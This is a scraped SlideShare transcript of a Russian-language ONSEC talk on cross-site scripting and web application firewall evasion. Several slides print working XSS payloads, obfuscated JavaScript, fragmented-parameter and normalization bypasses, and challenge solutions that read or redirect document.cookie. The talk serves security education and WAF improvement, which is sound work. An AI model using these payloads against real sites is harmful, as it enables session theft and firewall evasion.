![• Простые сигнатуры часто ошибаются:
“ „ < > [ { } ] ( )
• Сложные сигнатуры всегда неполные из-за
разнообразия браузеров и проч.
onmouseover -> onmouseenter
• Данные надо нормализовать перед
сигнатурным анализом
e\xp\re\s\s\i\o\n(alert
(1337))
WAF: сложности в реализации
* подъем!](https://image.slidesharecdn.com/xssvswaf-101111135143-phpapp02/85/ONSEC-XSS-vs-waf-11-320.jpg)
![• Есть функционал веб-приложения, где WAF
должен быть отключен (HTML редактор)
• Веб-приложение может быть уязвимо для
фрагментированных атак
http://localhost/t.php?a=<scri&a=pt>&a=alert(1)&a=<
/scri&a=pt>
• Надо встраивать интерпретатор JavaScript:
document[(![]+/./)[5]+(![]+/./)[1]+(![]+/./)[1]+String.from
CharCode(75,73)+(![]+/./)[4]]
WAF: сложности в реализации
* подъем!](https://image.slidesharecdn.com/xssvswaf-101111135143-phpapp02/85/ONSEC-XSS-vs-waf-12-320.jpg)
![• Opened XSS challenge at http://onsec.ru/t.php
• WAF фильтрует
„ , ", < , > , ( , ) , // в $_GET, $_POST, $_COOKIE, $_FILE
• Внедрения в код
• “<input type='text' name='text' value=„ ”.$_GET[„text‟]. “ „>”
• “<input type='text' name='search„
value=“.$_POST[„search‟].”>”
• “<h3 onmouseover=“.$_GET[„aaa‟].”>”
Проведем эксперимент
* подъем!](https://image.slidesharecdn.com/xssvswaf-101111135143-phpapp02/85/ONSEC-XSS-vs-waf-15-320.jpg)
![• Opened XSS challenge at http://onsec.ru/t.php
• Решения от oRB [rdot.org]
/t.php?aaa=document.location.href=[document.referrer,docu
ment.cookie]
/t.php?aaa=document.location=[/javascript:1/.source,location
.pathname,location.hash]#/;alert(document.cookie);
• Решение от asddas [rdot.org]
/t.php?aaa=document.location.href=document.forms[0].text.v
alue&text=http:google.com
Проведем эксперимент
* подъем!](https://image.slidesharecdn.com/xssvswaf-101111135143-phpapp02/85/ONSEC-XSS-vs-waf-16-320.jpg)
![• Opened XSS challenge at http://onsec.ru/t.php
• Решение от Влада Роскова [vos.uz]
/t.php?aaa=document.all[5][window.name]=location.hash#
<input style=width:100%;height:100%;
onmouseover="alert(document.cookie)">
• Самое элегантное решение от Ruben Ventura [thr3w]
/t.php?aaa=location.href=%26quot;javascript:alertu0028/XS
S/.sourceu0029%26quot;
Проведем эксперимент
* подъем!](https://image.slidesharecdn.com/xssvswaf-101111135143-phpapp02/85/ONSEC-XSS-vs-waf-17-320.jpg)
[ONSEC ]XSS vs waf
- 1. XSS vs WAF Best practice
- 2. • Межсайтовое выполнение сценариев • Может быть использовано злоумышленником для получения данных (cookie, DOM, etc), проведения других атак (CSRF, SPAM). • Классический пример: <input type=text value=“”><script>alert(document.cookie)</script>”> XSS: Cross Site Scripting * можно спать
- 3. • Reflected (non-persistent) – отраженные. Ответ сервера содержит данные из запроса. • Stored (persistent) – хранимые. Ответ сервера содержит данные, внедренные ранее. • DOM based – динамические. Страница на клиентской стороне динамически может быть изменена данными запроса. XSS: Международная классификация * можно спать
- 4. • Внедрение тэга: <input type=text value=><script>alert(1337)</script> • Внедрение атрибута: <a href=„http://cmc.msu.su‟ onclick=alert(1337) a=„„> • Внедрение в активное содержимое (JavaScript,SWF,PDF): if (text==„a‟ || alert(1337) || „‟) { • Внедрение в заголовок HTTP ответа, другое: Location: javascript:alert(1) - miXSS XSS: Техническая классификация * можно спать
- 5. • Tyler Reguly, nCircle at 06.04.2010 miXSS: meta information XSS * можно проснуться
- 6. • Требующие действий пользователя: <a href=„a‟ onmouseover=alert(1337) style=„font- size:500px„> • Автономные: <input type=text value=a onfocus=alert(1337) AUTOFOCUS> XSS: Классификация по реализации * можно спать
- 7. • Twitter 21.09.2010: http://twitter.com/nn#@"onmouseover="alert(1337);"/ • Youtube 04.07.2010: XSS: latest examples * можно просыпаться
- 8. • Cross Application Scripting • Множество GUI понимает HTML From XSS to CAS: все новое – это.. * можно проснуться http://www.backtrack-linux.org/backtrack/cross-application- scripting-all-you-kde-are-belong-to-us/
- 9. • SMS manager: tel:/+7123213?call • Safari: <iframe src=“skype://+27836712?call”> • Mail manager: Пример закрыт до устранения уязвимости iPhone/iPad CAS prototypes * надо запомнить
- 10. • Блокирует подозрительный запрос • Исправляет подозрительный запрос • Блокирует источник подозрительного запроса • Подозрительный по сигнатурам – подходит под рег. выражение, типа: «onmouse*». • Подозрительный по правилам – запрос без предыстории (сразу на страницу смены пароля без посещения главной) WAF: Web Application Firewall * пора просыпаться
- 11. • Простые сигнатуры часто ошибаются: “ „ < > [ { } ] ( ) • Сложные сигнатуры всегда неполные из-за разнообразия браузеров и проч. onmouseover -> onmouseenter • Данные надо нормализовать перед сигнатурным анализом e\xp\re\s\s\i\o\n(alert (1337)) WAF: сложности в реализации * подъем!
- 12. • Есть функционал веб-приложения, где WAF должен быть отключен (HTML редактор) • Веб-приложение может быть уязвимо для фрагментированных атак http://localhost/t.php?a=<scri&a=pt>&a=alert(1)&a=< /scri&a=pt> • Надо встраивать интерпретатор JavaScript: document[(![]+/./)[5]+(![]+/./)[1]+(![]+/./)[1]+String.from CharCode(75,73)+(![]+/./)[4]] WAF: сложности в реализации * подъем!
- 13. • Поиск не фильтруемых данных (_FILES, URI …) • Поиск ошибок в нормализации (uni/*union*/on, u000000028) • Поиск не фильтруемых сигнатур • Поиск ошибок логики (XSS threw white list) • Остальные методы HOWTO find WAF 0day ;) * подъем!
- 14. • Попробуйте проверить WAF на фильтрацию JavaScript функции setInterval() • setInterval – аналог setTimeout, введенный для совместимости со старыми версиями JavaScript • Эту функцию почему-то забывают добавлять в сигнатуры, ограничиваясь только setTimeout • Таких примеров очень-очень много, посмотрите хотя бы список событий на http://msdn.microsoft.com/en- us/library/ms533051(VS.85).aspx HOWTO find WAF 0day ;) * подъем!
- 15. • Opened XSS challenge at http://onsec.ru/t.php • WAF фильтрует „ , ", < , > , ( , ) , // в $_GET, $_POST, $_COOKIE, $_FILE • Внедрения в код • “<input type='text' name='text' value=„ ”.$_GET[„text‟]. “ „>” • “<input type='text' name='search„ value=“.$_POST[„search‟].”>” • “<h3 onmouseover=“.$_GET[„aaa‟].”>” Проведем эксперимент * подъем!
- 16. • Opened XSS challenge at http://onsec.ru/t.php • Решения от oRB [rdot.org] /t.php?aaa=document.location.href=[document.referrer,docu ment.cookie] /t.php?aaa=document.location=[/javascript:1/.source,location .pathname,location.hash]#/;alert(document.cookie); • Решение от asddas [rdot.org] /t.php?aaa=document.location.href=document.forms[0].text.v alue&text=http:google.com Проведем эксперимент * подъем!
- 17. • Opened XSS challenge at http://onsec.ru/t.php • Решение от Влада Роскова [vos.uz] /t.php?aaa=document.all[5][window.name]=location.hash# <input style=width:100%;height:100%; onmouseover="alert(document.cookie)"> • Самое элегантное решение от Ruben Ventura [thr3w] /t.php?aaa=location.href=%26quot;javascript:alertu0028/XS S/.sourceu0029%26quot; Проведем эксперимент * подъем!
- 18. • WAF обнаруживает злоумышленника • WAF закрывает какие-то вектора атаки • WAF – хороший, сделайте его еще лучше! WAF: так ли все плохо? * можно снова спать